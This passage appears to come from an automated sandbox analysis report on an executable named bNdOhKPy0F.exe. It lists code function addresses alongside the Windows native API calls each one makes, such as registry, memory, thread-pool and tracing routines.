Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 1_2_6E1DCF70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 1_2_6E126F60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8F6A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AF60 ZwSetTimer2, 1_2_6E16AF60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 1_2_6E1B176C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D5F87 ZwUnmapViewOfSection, 1_2_6E1D5F87
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5780 DbgPrompt,ZwWow64DebuggerCall, 1_2_6E1B5780
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E122FB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1697A0 ZwUnmapViewOfSection, 1_2_6E1697A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E163FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 1_2_6E163FA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AFD0 ZwShutdownWorkerFactory, 1_2_6E16AFD0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 1_2_6E15DFDF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 1_2_6E12F7C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1697C0 ZwTerminateProcess, 1_2_6E1697C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E130FFD RtlInitUnicodeString,ZwQueryValueKey, 1_2_6E130FFD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B0FEC ZwDuplicateObject,ZwDuplicateObject, 1_2_6E1B0FEC
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1537EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 1_2_6E1537EB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E160413 ZwUnmapViewOfSection, 1_2_6E160413
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8C14
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1411 ZwTraceEvent, 1_2_6E1E1411
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14FC39 ZwAssociateWaitCompletionPacket, 1_2_6E14FC39
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A420 ZwGetNlsSectionPtr, 1_2_6E16A420
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 1_2_6E125450
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1C49 ZwQueryInformationProcess, 1_2_6E1B1C49
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169C40 ZwAllocateVirtualMemoryEx, 1_2_6E169C40
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169C70 ZwAlpcConnectPort, 1_2_6E169C70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E165C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 1_2_6E165C70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8C75
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1C76 ZwQueryInformationProcess, 1_2_6E1B1C76
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 1_2_6E15AC7B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 1_2_6E14746D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 1_2_6E1D3C60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 1_2_6E1A3C93
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A480 ZwInitializeNlsFiles, 1_2_6E16A480
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F9CB3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F4CAB ZwTraceControl, 1_2_6E1F4CAB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122CDB RtlFreeHeap,ZwClose,ZwSetEvent, 1_2_6E122CDB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8CD6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1E14FB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 1_2_6E1D64FB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 1_2_6E12F4E3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1CE4 ZwQueryInformationProcess, 1_2_6E1B1CE4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1D0B ZwSetInformationProcess, 1_2_6E1B1D0B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8D34
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 1_2_6E154D3B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E151520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E151520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169520 ZwWaitForSingleObject, 1_2_6E169520
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFD22 ZwQueryInformationProcess,RtlUniform, 1_2_6E1DFD22
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 1_2_6E1F1D55
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1D43 ZwQueryInformationThread, 1_2_6E1B1D43
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169D70 ZwAlpcQueryInformation, 1_2_6E169D70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 1_2_6E1B1570
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1D6A ZwWaitForMultipleObjects, 1_2_6E1B1D6A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E6D61 ZwAllocateVirtualMemoryEx, 1_2_6E1E6D61
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123591 ZwSetInformationFile, 1_2_6E123591
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 1_2_6E13DD80
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1582 ZwTraceEvent, 1_2_6E1E1582
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1EB581
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1695B0 ZwSetInformationThread, 1_2_6E1695B0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169DB0 ZwAlpcSetInformation, 1_2_6E169DB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1265A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 1_2_6E1265A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169DA0 ZwAlpcSendWaitReceivePort, 1_2_6E169DA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1245D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 1_2_6E1245D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1695D0 ZwClose, 1_2_6E1695D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1DFDD3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14EDC4 ZwCancelWaitCompletionPacket, 1_2_6E14EDC4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 1_2_6E124DC0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1695C0 ZwSetEvent, 1_2_6E1695C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1295F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 1_2_6E1295F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1695F0 ZwQueryInformationFile, 1_2_6E1695F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 1_2_6E1DBDFA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169DE0 ZwAssociateWaitCompletionPacket, 1_2_6E169DE0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 1_2_6E125210
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 1_2_6E1F8214
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169A00 ZwProtectVirtualMemory, 1_2_6E169A00
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 1_2_6E15B230
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169A30 ZwTerminateThread, 1_2_6E169A30
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E128239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 1_2_6E128239
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 1_2_6E124A20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 1_2_6E129240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 1_2_6E1B1242
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8A62
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 1_2_6E15D294
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AA90 ZwQuerySystemInformationEx, 1_2_6E16AA90
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 1_2_6E12429E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E142280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 1_2_6E142280
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B280 ZwWow64DebuggerCall, 1_2_6E16B280
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 1_2_6E15DA88
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169AB0 ZwWaitForMultipleObjects, 1_2_6E169AB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15E2BB ZwWaitForAlertByThreadId, 1_2_6E15E2BB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E121AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 1_2_6E121AA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E155AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 1_2_6E155AA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8ADD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 1_2_6E14FAD0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1AD6 ZwFreeVirtualMemory, 1_2_6E1B1AD6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AAC0 ZwQueryWnfStateNameInformation, 1_2_6E16AAC0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169AE0 ZwTraceEvent, 1_2_6E169AE0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AAE0 ZwRaiseException, 1_2_6E16AAE0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1E131B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 1_2_6E124B00
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E155306 ZwReleaseKeyedEvent, 1_2_6E155306
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169B00 ZwSetValueKey, 1_2_6E169B00
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129335 ZwClose,ZwClose, 1_2_6E129335
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8B58
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B48 ZwClose,ZwClose, 1_2_6E153B48
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AB70 ZwReleaseWorkerFactoryWorker, 1_2_6E16AB70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 1_2_6E1B8372
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122B7E ZwSetInformationThread,ZwClose, 1_2_6E122B7E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 1_2_6E153B7A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 1_2_6E1D6369
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AB60 ZwReleaseKeyedEvent, 1_2_6E16AB60
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 1_2_6E1B6365
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 1_2_6E122B93
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 1_2_6E15939F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1E138A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F9BBE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8BB6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A3A0 ZwGetCompleteWnfStateSubscription, 1_2_6E16A3A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1E1BA8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 1_2_6E154BAD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 1_2_6E122BC2
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1223F6 ZwClose,RtlFreeHeap, 1_2_6E1223F6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169BF0 ZwAlertThreadByThreadId, 1_2_6E169BF0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 1_2_6E13A3E0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1FF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 1_2_6E1FF019
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 1_2_6E12F018
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169830 ZwOpenFile, 1_2_6E169830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 1_2_6E154020
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 1_2_6E125050
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169850 ZwQueryDirectoryFile, 1_2_6E169850
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8858 ZwAlertThreadByThreadId, 1_2_6E1F8858
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169840 ZwDelayExecution, 1_2_6E169840
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 1_2_6E1B1879
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13106F ZwOpenKey,ZwClose, 1_2_6E13106F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A890 ZwQueryDebugFilterState, 1_2_6E16A890
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169890 ZwFsControlFile, 1_2_6E169890
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 1_2_6E123880
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 1_2_6E15A080
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16108B ZwClose, 1_2_6E16108B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B0B0 ZwTraceControl, 1_2_6E16B0B0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 1_2_6E15F0BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1518B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 1_2_6E1518B9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14F0AE ZwSetInformationWorkerFactory, 1_2_6E14F0AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D60A2 ZwQueryInformationFile, 1_2_6E1D60A2
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1610D7 ZwOpenKey,ZwCreateKey, 1_2_6E1610D7
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A0D0 ZwCreateTimer2, 1_2_6E16A0D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1698D0 ZwQueryAttributesFile, 1_2_6E1698D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1270C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 1_2_6E1270C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1600C2 ZwAlertThreadByThreadId, 1_2_6E1600C2
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 1_2_6E12B8F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1240FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 1_2_6E1240FD
